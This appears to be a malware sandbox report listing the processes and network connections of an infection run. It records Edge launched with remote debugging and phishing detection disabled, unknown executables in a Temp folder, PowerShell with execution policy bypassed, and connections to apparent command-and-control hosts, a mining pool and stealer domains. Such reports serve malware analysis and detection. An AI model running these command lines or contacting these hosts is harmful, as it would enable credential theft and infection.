"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5892 -ip 5892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2508 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3880 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2292 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2388 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2420 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2496 /prefetch:2

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1392,15895515533642466494,13465131436476367318,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3

C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe

"C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vgpnm4xz\vgpnm4xz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB81B.tmp" "c:\Users\Admin\AppData\Local\Temp\vgpnm4xz\CSCBC6EB7F1C56F4088AC3A5D91EAABC6C2.TMP"

C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe

"C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3956 /prefetch:2

C:\Windows\explorer.exe

explorer.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3964 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2208 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4784 /prefetch:2

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,18317297001410750486,10356410680120650361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2536 /prefetch:2

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe

"C:\Users\Admin\AppData\Local\Temp\10107710101\8a07a872cb.exe"

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
NL 45.154.98.175:6969 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 192.248.189.11:443 pool.hashvault.pro tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 104.21.68.89:443 biochextryhub.bet tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.68.89:443 biochextryhub.bet tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.68.89:443 biochextryhub.bet tcp
US 104.21.68.89:443 biochextryhub.bet tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 104.21.68.89:443 biochextryhub.bet tcp
US 8.8.8.8:53 t.me udp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 ls.t.goldenloafuae.com udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.68.89:443 biochextryhub.bet tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.200:80 e5.o.lencr.org tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 104.21.69.194:443 codxefusion.top tcp
US 213.209.150.137:4117 towerbingobongoboom.com tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
US 104.21.9.123:443 moderzysics.top tcp
CH 185.208.156.162:80 185.208.156.162 tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 172.217.169.74:443 ogads-pa.googleapis.com tcp
US 104.21.9.123:443 moderzysics.top tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 172.217.169.74:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.180.14:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.169.65:443 clients2.googleusercontent.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
FI 95.217.27.252:443 ls.t.goldenloafuae.com tcp
US 150.171.28.10:443 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.21:443 nw-umwatson.events.data.microsoft.com tcp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.112.1:443 exarthynature.run tcp
N/A 224.0.0.251:5353 udp
US 104.21.112.1:443 exarthynature.run tcp
N/A 127.0.0.1:9223 tcp
US 104.21.112.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
NL 149.154.167.99:443 t.me tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.22:443 nw-umwatson.events.data.microsoft.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
